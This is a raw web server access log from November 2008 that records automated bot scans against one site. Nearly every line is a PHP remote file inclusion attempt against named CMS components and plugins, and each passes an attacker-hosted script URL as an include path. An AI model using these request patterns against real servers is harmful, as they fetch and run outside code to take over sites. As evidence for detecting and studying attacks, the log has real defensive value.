70.38.38.230 - - [02/Nov/2008:19:57:56 -0800] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
70.38.38.230 - - [02/Nov/2008:19:57:56 -0800] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:19:58:19 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.93.147.155 - - [02/Nov/2008:19:58:46 -0800] "GET /logs/access_080804.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:19:59:28 -0800] "GET /logs/access.log////kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:19:59:28 -0800] "GET ///kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
200.140.135.93 - - [02/Nov/2008:19:59:28 -0800] "GET /logs////kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:59:55 -0800] "GET /logs/access.log/errors.php?error=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:59:55 -0800] "GET /errors.php?error=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:19:59:55 -0800] "GET /logs/errors.php?error=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
24.41.95.132 - - [02/Nov/2008:20:00:06 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
24.41.95.132 - - [02/Nov/2008:20:00:06 -0800] "GET /logs/access_080804.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
24.41.95.132 - - [02/Nov/2008:20:00:06 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
24.41.95.132 - - [02/Nov/2008:20:00:43 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
70.38.38.230 - - [02/Nov/2008:20:01:28 -0800] "GET /logs/access_080811.log//plugins/safehtml/safehtml.php?dir[plugins]=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
88.84.145.169 - - [02/Nov/2008:20:02:07 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:02:22 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
24.41.95.132 - - [02/Nov/2008:20:03:17 -0800] "GET /logs/access_080804.log%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://you-buy-viagra.com/files/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:20:03:30 -0800] "GET /logs/access_080811.log/errors.php?error=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.120.7.147 - - [02/Nov/2008:20:05:13 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.120.7.147 - - [02/Nov/2008:20:05:13 -0800] "GET /faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.120.7.147 - - [02/Nov/2008:20:05:13 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
64.156.24.21 - - [02/Nov/2008:20:05:40 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.156.24.21 - - [02/Nov/2008:20:05:40 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.156.24.21 - - [02/Nov/2008:20:05:40 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:08:29 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:08:29 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:08:29 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:08:29 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:20:09:28 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:20:09:28 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:20:09:28 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:20:10:14 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:20:10:14 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:20:10:14 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.53.141.2 - - [02/Nov/2008:20:12:03 -0800] "GET /logs/access.log////kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.53.141.2 - - [02/Nov/2008:20:12:03 -0800] "GET /logs////kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.53.141.2 - - [02/Nov/2008:20:12:03 -0800] "GET ///kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:12:13 -0800] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:12:13 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:12:14 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
213.171.225.234 - - [02/Nov/2008:20:13:48 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.171.225.234 - - [02/Nov/2008:20:13:49 -0800] "GET //vwar/backup/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.171.225.234 - - [02/Nov/2008:20:13:49 -0800] "GET /logs///vwar/backup/errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
213.189.20.26 - - [02/Nov/2008:20:17:23 -0800] "GET /logs/access_080804.log//admin/classes/TplLoad.php?full_path_to_public_program=http://splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:20:46 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:20:46 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:20:46 -0800] "GET /logs/access_080811.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
87.106.16.18 - - [02/Nov/2008:20:23:49 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
87.106.16.18 - - [02/Nov/2008:20:23:49 -0800] "GET /logs/access_080825.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:29 -0800] "GET /logs/access_080811.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:29 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:30 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:32 -0800] "GET /logs/access_080811.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:32 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:33 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:35 -0800] "GET /logs/access_080811.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:35 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
216.246.55.229 - - [02/Nov/2008:20:31:35 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:20:32:53 -0800] "GET /logs/access_080811.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:20:32:53 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.149.69.97 - - [02/Nov/2008:20:32:53 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:20:38:53 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:20:39:36 -0800] "GET /logs/access_080804.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:20:42:03 -0800] "GET /logs/access.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/id2? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:20:42:03 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/id2? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:20:42:04 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/id2? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:20:47:53 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/id2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
58.141.74.8 - - [02/Nov/2008:20:50:50 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [02/Nov/2008:20:50:51 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [02/Nov/2008:20:50:51 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:01:22 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:01:22 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:01:22 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:01:23 -0800] "GET /logs/access_080825.log/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:01:23 -0800] "GET /errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:01:23 -0800] "GET /logs/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:02:09 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:02:09 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:02:09 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:02:22 -0800] "GET /logs/access_080825.log/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:02:22 -0800] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:02:23 -0800] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
78.111.80.12 - - [02/Nov/2008:21:05:43 -0800] "GET /logs/access_080804.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.12 - - [02/Nov/2008:21:05:43 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.12 - - [02/Nov/2008:21:05:43 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
58.141.74.8 - - [02/Nov/2008:21:08:54 -0800] "GET /logs/access_080804.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [02/Nov/2008:21:08:55 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
58.141.74.8 - - [02/Nov/2008:21:08:55 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pyz.cl/images/idv8.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:29 -0800] "GET /logs/access_080825.log/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:29 -0800] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:30 -0800] "GET /logs/access_080825.log/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:30 -0800] "GET /logs/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:30 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:30 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:31 -0800] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:31 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:31 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:32 -0800] "GET /errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:32 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:21:10:34 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:12:04 -0800] "GET /logs/?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:12:04 -0800] "GET /?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:12:04 -0800] "GET /logs/access_080825.log/?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:14:07 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:14:07 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
69.72.144.18 - - [02/Nov/2008:21:14:07 -0800] "GET /logs/access_080804.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
207.150.183.60 - - [02/Nov/2008:21:15:14 -0800] "GET /logs/access_080804.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.150.183.60 - - [02/Nov/2008:21:15:15 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.150.183.60 - - [02/Nov/2008:21:15:15 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:16:39 -0800] "GET /logs/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:21:16:39 -0800] "GET /?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.800" "www.vspeaking.com"
